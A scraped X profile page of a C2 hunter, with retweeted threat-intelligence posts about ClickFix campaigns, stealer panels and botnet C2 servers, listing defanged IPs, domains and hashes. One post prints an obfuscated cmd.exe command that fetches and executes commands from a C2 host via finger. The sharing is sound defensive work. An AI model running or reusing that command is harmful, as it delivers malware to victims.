Dee

1.4K posts

Dee banner
Dee

Dee

@ViriBack

#Malware C2 hunter #infosec passionate. Tweets are my own.

Canada Katılım Mart 2015
1.1K Takip Edilen10.3K Takipçiler
Dee retweetledi
Raaz
Raaz@solostalking·
Lucid Stealer being promoted on telegram Panels: 85[.239.155.68 ghdfhfjhfg[.webhop.me iloveyoulucid[.space 0kt[.one storedonutsmp[.net lucidstealer[.one
Raaz tweet media
English
1
6
13
2.1K
Dee retweetledi
Cyberthint
Cyberthint@cyberthint·
During our routine threat hunting activities, we detected a new active #ClickFix campaign. Typical; what initially appears to be "robot verification" is actually direct malware distribution. ATTACK CHAIN 1️) Fake verification page → 151.243.18[.]254 2️) User is prompted to run a PowerShell command 3️) The Base64 encoded command script is decoded and connected to C2 → 94.26.83[.]199 4️) Payload is downloading → /download CRITICAL POINTS - The file name changes with each download: "imagetransfer.exe", "audiobackup.exe", "archive_report.exe", "new-photo.exe" - Each downloaded file has a different name but the same SHA256 hash - TLS SNI Camouflage: "ecs.office.com", "cdn.steamstatic.com" TECHNICAL BEHAVIORS Base64 encoding, obfuscation, payload download via PowerShell, %TEMP% drop, silent execution with "-WindowStyle Hidden", console hiding, runtime parsing (GetProcAddress) CAPABILITIES Persistence (registry + startup), clipboard data collection, webcam access, file system discovery, command execution. #IOCs IPs: 151.243.18[.]254, 94.26.83[.]199 Paths: /check, /download Hash (SHA256): 7d3654531c32d941b8cae81c4137fc542172bfa9635f169cb392f245a0a12bcb Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run #threathunting #malwareanalysis #powershell #blueteam #soc #dfir #ioc #cyberthreat #cyberthint
Cyberthint tweet mediaCyberthint tweet media
English
3
20
62
6.1K
Dee retweetledi
MalwareHunterTeam
MalwareHunterTeam@malwrhunterteam·
"L0G1N - D4R7H V4D3R": http://65.109.55[.]181:8181/login "4CC3SS D3N13D - 1D3NT1FY Y0URS3LF" "0P3R4D0R" "S3NH4" With such texts, it must be the panel of some sophisticated, complex, APT's malware, right? 😂 🤷‍♂️ @1ZRR4H
MalwareHunterTeam tweet media
English
7
10
80
39.1K
Dee retweetledi
Voidwalker
Voidwalker@JustWantToQ1·
Unknown C2
Voidwalker tweet media
English
2
7
101
11.8K
Dee retweetledi
Unit 42
Unit 42@Unit42_Intel·
Finger protocol LOLBin #ClickFix campaign that uses fake AI tools, background removers and LinkedIn lures and injects “finger <username> @ C2” with 12+ lure domains containing fake reCAPTCHA, 6 Finger usernames and 6 rotating C2 domains. Details at: bit.ly/3Rmc4Pl
Unit 42 tweet mediaUnit 42 tweet mediaUnit 42 tweet media
English
1
37
145
10K
Dee retweetledi
MalwareHunterTeam
MalwareHunterTeam@malwrhunterteam·
Some panel named phantom: http://194.59.31[.]192:8443/ "command and control" 🤷‍♂️
MalwareHunterTeam tweet media
English
6
11
109
17.1K
Dee retweetledi
whoamix302
whoamix302@whoamix302·
#KrimeC2 In addition to IP 193.58.122[.]24, two additional IPs, 144.31.165[.]219 and 144.31.165[.]210, are hosting the same C2.
whoamix302 tweet media
whoamix302@whoamix302

#KrimeC2 --> 193.58.122[.]24:666 The dashboard could not be accessed over port 666. Upon reviewing the IP, it appears that a sample was submitted last month which communicates with the associated C2 server. The domain d1.0x-team[.]sbs was registered three months ago.

English
1
4
19
1.9K
Dee retweetledi
eKg_
eKg_@eKg_sec·
> ClickFix -> CastleLoader -> CastleBot using Finger LOLBin > Stage 1 > "C:\WINDOWS\system32\cmd.exe" /c start "" /min for /f "skip=18 delims=" %T in ('f^^i^^n^^g^^e^^r NjoDPATzUB@cheeshoumreciple.]com') do %T & echo > 38.146.25.]206 #malware #clickfix #castleloader #castlebot
eKg_ tweet media
English
2
16
62
4.8K
Dee retweetledi
MalwareHunterTeam
MalwareHunterTeam@malwrhunterteam·
Some panel with title "SPIDY C2 - Secure Login": https://vayusena[.]online/login "Secure Command & Control Interface" Looks more laughable (especially with the "256-bit AES Encrypted Session" text) than some real serious thing, but still possible interesting... 🤷‍♂️
MalwareHunterTeam tweet media
English
3
2
21
3.9K
Dee retweetledi
James
James@James_inthe_box·
#unknown panel associated with: bf777e4dee6918d2373ba83433b4a7530d6e69465a1b6107ef4fd43f4ea60ec4 cc @ViriBack
James tweet media
English
0
5
10
4.3K
Dee retweetledi
BreakGlass Intelligence
BreakGlass Intelligence@BreakGlassIntel·
A community tip led us to a previously undocumented C2 panel family — "BORZ" at 94.232.46[.]16. Dual-process loader using Slack as a decoy. Botnet C2 on game server ports 27015/27016. Drops a text file referencing "Khorramshahr-4" — an Iranian ballistic missile designation. Hosted on AS48080 (Moscow). The ASN announces zero prefixes — possible covert transit. Neighboring IPs in the /24 have 84K+ abuse reports. Our assessment: the Iranian naming is likely a false flag. The infrastructure pattern does not align with known IRGC-affiliated operations. Blog: intel.breakglass.tech/post/borz-c2-i… #BORZ #Botnet #C2 #ThreatIntel
English
1
3
14
2K